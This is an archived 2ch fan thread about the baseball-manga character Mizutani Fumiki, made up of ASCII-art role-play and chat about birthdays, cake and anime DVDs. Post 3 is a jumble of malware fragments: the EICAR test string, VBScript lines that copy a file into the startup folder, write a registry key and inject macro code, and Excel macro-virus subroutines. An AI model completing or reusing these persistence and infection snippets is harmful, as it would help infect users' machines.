2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ヘヘン】おお振り 水谷文貴 生クリーム4倍【米ですよ】

1 :( * ´∀` )<米谷プニ貴です:2007/11/27(火) 00:25:02 ID:EB6x0mu3
おお振りのクソレフト改めナイバッチ改めライスサード水谷文貴のスレです。
水谷のことについて、色々語ったり叫んだりして下さい。
次スレは>>970が立ててください。無理なら980に頼んでください。
※AAが多いのはこのスレの持ち味ですが、過度の連続他キャラは控えましょう。

(*´∀`)<米って何?

2 :名無しかわいいよ名無し:2007/11/27(火) 01:07:19 ID:1u1zmCyz
>>1
プニ貴おつ!

(*´∀`)<そして人生初の>>2げっとー!

3 :名無しかわいいよ名無し:2007/11/27(火) 01:14:57 ID:caMxJLkD
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


4 :名無しかわいいよ名無し:2007/11/27(火) 02:11:54 ID:1IRirnxq
>>1米谷乙〜
なんというカオスなスレタイ。
そして>>1の米谷の顔がぽっちゃり気味な件。

5 :名無しかわいいよ名無し:2007/11/27(火) 03:25:42 ID:EoDWBd0A
>>1乙!


6 :名無しかわいいよ名無し:2007/11/27(火) 05:43:55 ID:EB6x0mu3
前スレ

【伸び盛り】おお振り水谷文貴【ナイバッチ】3ヒット目 (落ちたため再建)
http://anime2.2ch.net/test/read.cgi/cchara/1190253979/

【伸び盛り】おお振り水谷文貴【ナイバッチ】3ヒット目
http://anime2.2ch.net/test/read.cgi/cchara/1187858038/

【ナイバッチ!】おお振り水谷文貴【クソレフト!】2エラー目
http://anime2.2ch.net/test/read.cgi/cchara/1183355097/

【クソレフト】おお振り水谷文貴【しーませーん】1スレ目
http://anime2.2ch.net/test/read.cgi/cchara/1179584784/

そういや水谷スレは5スレ目だったんだね。
立てた後に5スレ目にすれば良かったかなぁとか思ったり

ま、いっか!

7 :名無しかわいいよ名無し:2007/11/27(火) 09:19:19 ID:ml4vVXir
今だ!ライモッチ米谷が7番ゲットォォォォ!!
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄  (´´
                  ∧ ∧       (´⌒(´
            ⊂(´∀`米)≡≡≡(´⌒;;;≡≡≡
        ⊆⊂´ ̄ ⊂ソ  (´⌒(´⌒;;
           ̄ ̄ ̄   ズザーーーーーッ

8 :名無しかわいいよ名無し:2007/11/28(水) 00:17:28 ID:77i+nMZL
ヘヘン>>1乙ですよ

巣山スレで使われてていいなーと思ったw

9 :名無しかわいいよ名無し:2007/11/28(水) 01:02:56 ID:wjHK7+Yn
>>1
>>8
IDが水谷ぽくてウラヤマシス

10 :名無しかわいいよ名無し:2007/11/28(水) 09:00:25 ID:DLLhYBCd
>>1乙。生クリーム4倍でぷにるフミキw

11 :名無しかわいいよ名無し:2007/11/28(水) 16:02:02 ID:nHo4XnSG
>>1乙です。
生クリ四倍という油断はメタボフラグ。
しかし前スレの>>999>>1000に頬が緩んだw
2008年ももっと活躍できればいいねー

12 :名無しかわいいよ名無し:2007/11/28(水) 17:15:50 ID:JBeSe0ho
今日、きよえさんの誕生日じゃなかったか?

13 :名無しかわいいよ名無し:2007/11/28(水) 19:10:06 ID:5sBDmt8P
(*´∀`)〈今日はねーねーの誕生日だから早く帰らなくちゃ

14 :名無しかわいいよ名無し:2007/11/28(水) 19:34:44 ID:7sSX335U
>>12
志村、前スレ前スレ!ww

15 :名無しかわいいよ名無し:2007/11/28(水) 19:36:11 ID:PzG2JsOn
ブログののリファ見てたら、「実力ですよ」で検索引っ掛かってたんだが、まさかwww

16 :名無しかわいいよ名無し:2007/11/28(水) 19:48:42 ID:AaUMwnTM
特定しますた

17 :名無しかわいいよ名無し:2007/11/28(水) 21:04:01 ID:zKP7f26S
>>15
(*´∀`)<リファってなーに?

18 :名無しかわいいよ名無し:2007/11/29(木) 00:21:20 ID:Un/sBW1I
>>17
リファラのことかと

19 :名無しかわいいよ名無し:2007/11/29(木) 00:43:18 ID:7UYImNqE
来月発売のDVD7巻が今から楽しみでしょうがないんだが
野球カードの裏の説明文とか中の人の水谷に対するコメントとか

特典BOX絵も今回こそは登場・・・するだろうし
毎日アニメ公式見に行ってるがなかなか公開されないよね

20 :名無しかわいいよ名無し:2007/11/29(木) 01:57:25 ID:NRd8/Y0N
>>18
サンクス。そっかリファラのことか〜

ってそれすら分かんね
やっべ、ググってこよ


21 :名無しかわいいよ名無し:2007/11/29(木) 08:23:22 ID:53SeMgCC
(*´∀`)<ブツブツ…(確か今日は泉の誕生日だから…2日連続でケーキはさすがに太るかな〜でも食べる〜放課後が楽しみ〜)


(∴・Д・)<花井〜別にケーキいらねーからしのーかに言っといて


(冫、)<おう。


(仝ω仝)<高校生になって誕生日にケーキはねーよな。女なら別にいーけど


(;´∀`)<……


22 :名無しかわいいよ名無し:2007/11/29(木) 09:30:32 ID:llQNGNje
>>21
おお!今日は泉の誕生日なのか〜!!
フミキはケーキ食べたさで林家ペーになってきてるねww

(*゚◇゚)<ケーキ 食べたかったな…
(*`▽´)<オレもケーキ食いたかったな〜!!

(*´∀`)<…こっそり買って来ちゃおうかな?
      サプライズで泉も喜んでくれるかも!?

23 :名無しかわいいよ名無し:2007/11/29(木) 09:54:20 ID:RFFqPLtK
>>22
(∴・Д・)<はぁ? ケーキ買ってきたのかよ いらねーっつったろ?
          つか、それただお前らが食いたかっただけじゃねえの?
           ったくケーキ食うのに他人の誕生日ダシにすんなよなぁ

泉ならサクッとこれ位言いそうだw

24 :名無しかわいいよ名無し:2007/11/29(木) 11:32:52 ID:53SeMgCC
(*゚◇゚)<…ケーキ…ケーキ…

(*´∀`)<ケーキ〜

(*`▽´)<あーケーキ〜 

(;=v=) <…お前らそんなにケーキ食いたきゃ俺が作ってやるよ!(てか休み時間のたんびにブツブツこえーよ)


(*゚◇゚)<本当 浜ちゃん

(;=v=) <…本格的なもんは無理だけどホットケーキくらいなら…

(*´∀`)(*`▽´)(*゚◇゚)<わ〜い!

(*`▽´)<じゃあ後で俺んち行こーぜ!今日は誰もいねーから大丈夫だ!


(∴ーДー)<(…親鳥(浜田 )が子供(三橋、田島、水谷)に餌やってるように見える…慣れたけどさ…)

25 :名無しかわいいよ名無し:2007/11/29(木) 14:16:06 ID:JS/3TeuQ
>>23
泉は辛口キャラとはいっても
そういうことは言わないんじゃないかな。

26 :名無しかわいいよ名無し:2007/11/29(木) 14:19:29 ID:cpf592VB
というか三橋の誕生日のときにケーキに喜んでたから
泉もケーキ好きなんだと思うけどw

27 :名無しかわいいよ名無し:2007/11/29(木) 14:41:42 ID:GKIgVHWa
(∴・Д・)<お前らが食いたかっただけだろ!
とかのツッコミは入れそうだけど、喜んで食いそうだな

>>23みたいなこと言ってても実は嬉しいんだよツンデレ泉は

28 :名無しかわいいよ名無し:2007/11/29(木) 15:19:23 ID:Fwd7BWNi

ケーキ!  ケーキ!

  ( * ´ ∀`)   
((  (  つ  ヽ、    <泉誕生日おめでとー
   〉  とノ  ) ))
  (____ノ^(___)

ケーキ! ケーキ!

29 :名無しかわいいよ名無し:2007/11/29(木) 16:07:33 ID:T6Ks66bM
>>28
携帯で見るとメタボぷに貴の股間が大変な事になってて吹いたw

嫌な事があってもここ見ると癒される〜
本誌でも水谷は完全癒し担当になってるよね


30 :名無しかわいいよ名無し:2007/11/29(木) 16:10:52 ID:d+RZM1Ez
>>23
寧ろ水谷の前で、サンキュ!これうめーよ!と全て食べきる方向で

31 :名無しかわいいよ名無し:2007/11/29(木) 17:19:11 ID:53SeMgCC
(*´∀`)<…次の誕生日誰かな…

(*´∀`)<…

(;´∀`)<あ、阿部か…誕生日を口実にケーキは無理か…

32 :名無しかわいいよ名無し:2007/11/29(木) 17:41:53 ID:Fwd7BWNi
>>29
 ちょ変なトコ見ないでよ〜
 ̄ ̄ ̄ ̄ ̄V ̄ ̄ ̄ ̄ ̄
 ( ;´∀`)
 人 Y / きゃあ
( ヽ し
(_)_)

33 :名無しかわいいよ名無し:2007/11/30(金) 14:13:47 ID:FCh3ULPl
おお振り界1「きゃあ」が似合う男、米谷。

34 :名無しかわいいよ名無し:2007/11/30(金) 22:53:52 ID:Ft6RZIxB
癒されるww

それにしてもDVD届いたんだけど、
初回特典のDJCDの表紙イラストのふみきが顔切れてて見えない
きっと眩しい笑顔なんだろうに…うわああああああ

35 :名無しかわいいよ名無し:2007/11/30(金) 22:58:59 ID:FE9soLRJ
(*゚◇゚)<メタボ!!

36 :名無しかわいいよ名無し:2007/12/01(土) 01:34:25 ID:aArb7l0I
>>35
なにィ―――ッ!!

37 :名無しかわいいよ名無し:2007/12/01(土) 07:21:52 ID:41dbHMWV
お前は俺を怒らせた

38 :名無しかわいいよ名無し:2007/12/02(日) 00:12:28 ID:euwSflnh
(*´∀`)<人いないなぁ

39 :名無しかわいいよ名無し:2007/12/02(日) 00:27:33 ID:sr5DArw5
他人の誕生日であんだけ盛り上がったのになw

40 :名無しかわいいよ名無し:2007/12/02(日) 00:28:54 ID:mkeitkqW
>>38
ノノ*´∨`)<最近ちょっと過疎ってるわよねー

次は誰の誕生日が近いだろ?

41 :名無しかわいいよ名無し:2007/12/02(日) 00:41:11 ID:j1rCGakU
人大杉だったてのもあるんだろうなー。そろそろ解除されたのか?圧縮あったみたいだし。
しかし>>35-37のおかげで圧縮を免れたのも確かw

42 :名無しかわいいよ名無し:2007/12/02(日) 02:20:49 ID:6QjgsnkT
こんなにすぐ圧縮かかると思わなかった。
普段は物性材料とか、2000年に立てたスレがまだあるような板にしかいないから。

ここは水谷みたいにのんびり屋の住人が多そうだから、
気をつけた方がいいね。

43 :名無しかわいいよ名無し:2007/12/02(日) 02:34:15 ID:2GBTR5b1
のんびりしすぎてテストがまずいことに…

そういえば前の話題でふみきは理系が得意とかいろいろ意見あったね〜
自分は勉強自体そんなにできるほうじゃなさそう…と思っていたから意外だったな
三橋、田島の次に危なそうに見える

44 :名無しかわいいよ名無し:2007/12/02(日) 04:33:29 ID:Lq/HlOKv
7組に混じってると頭良さそうに見えないか?

45 :名無しかわいいよ名無し:2007/12/02(日) 04:43:51 ID:l3NoxOgV
>>40
(仝ω仝)ノシ

46 :名無しかわいいよ名無し:2007/12/02(日) 09:57:59 ID:rxbvrJGU
>>44
花井(真面目)
篠岡(努力家)
阿部(頭脳派)

成る程なー
勉強できるフミキもなんだかいい気がする

(仝ω仝)つ<○ これでも食っとけ(頭脳パン)

47 :名無しかわいいよ名無し:2007/12/02(日) 12:28:14 ID:HJoVMXYF
フミキは3択の問題とか得意そう。そんなとこだけ運がいいフミキww
でもケアレスミスが多そうなんだよなー
あと漢字の間違い

48 :名無しかわいいよ名無し:2007/12/02(日) 16:05:52 ID:WuaLgRBv
じゃあ自分はフミキにこれを つ□(アンキパン)

49 :名無しかわいいよ名無し:2007/12/02(日) 16:51:24 ID:QuwpVct9
勉強そこそこ出来るのにふにゃふにゃの文貴…
そんなキャラ愛さずにはいられないよ!w
あと水谷は何気に絵が上手そうと思うのは自分だけ?
ぼへ〜っとしてるから空想癖がありそうだと

50 :名無しかわいいよ名無し:2007/12/02(日) 16:53:52 ID:UtoPDC7b
そんなドラえもんww


51 :名無しかわいいよ名無し:2007/12/02(日) 17:00:57 ID:scdBIT1A
フミキ父が野球好きとか、野球やってたとかは無いだろうか
最初は野球を「やらされた」からはじまって、結果的に高校でも野球部に入る程好きになったというか。遺伝的に野球好きな血が流れてるというか。
フニャフニャなフミキが自主的に野球やりだしたとは考えにくいんだぜ

52 :名無しかわいいよ名無し:2007/12/02(日) 17:07:59 ID:AzcfG0aX
巣山スレからきました
>>35-37の流れわろたw巣山のアレだなw

53 :名無しかわいいよ名無し:2007/12/02(日) 17:46:36 ID:xPdGzXtd
流れ的にジャイアンみたいなのいたんじゃね?w

54 :名無しかわいいよ名無し:2007/12/02(日) 19:02:43 ID:QDw+hH8B
巣山スレに29日に来てたぞ
総勢8人にフルボッコされてたけどw

55 :名無しかわいいよ名無し:2007/12/03(月) 07:18:18 ID:WNyP4m6C
(*´∀`)<人居ないなあ

56 :名無しかわいいよ名無し:2007/12/03(月) 09:36:41 ID:CDK7MyOD
>>51
赤ちゃんの頃の写真でテニスボール持ってたから、親はテニスさせたかったとかあるかもなー

>>55
このスレはフミキが本誌でたくさん出張るよりも
ちょっとのコマでネタにされてるときの方が盛り上がる不思議www

57 :名無しかわいいよ名無し:2007/12/03(月) 14:10:43 ID:hjzMzEm1
皆フミキが派手に目立つとどうすればいいか分かんなくなっちゃうんだよw
本誌買った日、目立ってた事が嬉しすぎてここで叫ぶの忘れたもんw

58 :名無しかわいいよ名無し:2007/12/03(月) 22:41:46 ID:VEksaXAN
人大杉ながいなー。専ブラじゃ気付かなかったが今IEで確認して納得した。

59 :名無しかわいいよ名無し:2007/12/04(火) 00:42:11 ID:IMpyt2fd
実は今回、水谷が打ってアウトになった場面が掛かれたのは「おお振り」史上初めてだったりする。
三星戦は打席がすべて省略されていたし、公式戦以降のアウトはすべて三振だったからね(港南戦は知らんが)。
しかしハデに討ち死にしたもんだなw
個人的には、「ヘッスラが間に合わなかった」はマジ発言だったと思うw

60 :名無しかわいいよ名無し:2007/12/04(火) 00:45:50 ID:aauuZner
あんまり上手くなくて、才能も普通な水谷だけど、
それでも高校になっても野球続けてるってことは、
野球が本当に好きで、努力家でもあるだなと思ってる。

61 :名無しかわいいよ名無し:2007/12/04(火) 01:36:19 ID:unluxNDI
>>56
あれテニスボールだったのか!てっきり犬猫がじゃれるボールかと思ってたw
テニス部フミキ、にあいすぎて嫌だぜwww

62 :名無しかわいいよ名無し:2007/12/04(火) 02:02:19 ID:o4Mxksn1
あれは両親がテニスやってたんだと思ってる
きよえさんなんて特にママさんテニス似合うし
文貴もテニスのルールくらいはわかってそうだなー

63 :名無しかわいいよ名無し:2007/12/04(火) 04:26:17 ID:P7PfaFoz
テニスのお米様

64 :名無しかわいいよ名無し:2007/12/04(火) 10:12:57 ID:R8Duvw+a
>>61
犬猫がじゃれるボールってwww
子フミキかわいいよ子フミキ

>>テニスのお米様
トレーニングメニューでテニスあったじゃん?(確か三橋と田島がやってたやつ)
あれだけはやたら上手いフミキとかw

65 :名無しかわいいよ名無し:2007/12/04(火) 15:56:35 ID:NUerOzPY
(*´∀`)<まだまだだね〜

17 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)